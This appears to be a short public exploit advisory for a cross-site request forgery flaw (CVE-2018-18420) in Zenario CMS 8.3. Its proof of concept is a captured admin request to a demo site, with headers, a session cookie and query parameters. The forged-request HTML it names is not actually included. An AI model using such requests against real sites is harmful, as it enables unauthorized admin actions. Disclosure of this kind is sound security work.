# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF ) # Date: 2018-05-21 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://zenar.io/ # Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997 # Software : Zenar Content Management System 8.3 # Version : 8.3 # Vulernability Type : Web Application # Vulenrability : Cross-Site Request Forgery ( CSRF ) # CVE : CVE-2018-18420 # Cross-Site Request Forgery (CSRF) vulnerability was discovered in # the 8.3 version of Zenar Content Management System via the # admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI. # POC : # GET Request : Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0 Request Method: GET Status Code: 200 OK Remote Address: 213.146.173.88:80 Referrer Policy: no-referrer-when-downgrade Accept: text/plain, */*; q=0.01 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: keep-alive Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1 Host: demo.zenar.io Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 X-Requested-With: XMLHttpRequest # Query String Parametres : path: zenario__content/panels/content skinId: refinerId: html refinerName: content_type refiner__content_type: html _limit: 50 _start: 0 _item: html_10 _sort_col: first_created_datetime _sort_desc: 0 # CSRF HTML : Zenar Content Management System - Cross-Site Request Forgery ( CSRF )

# You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln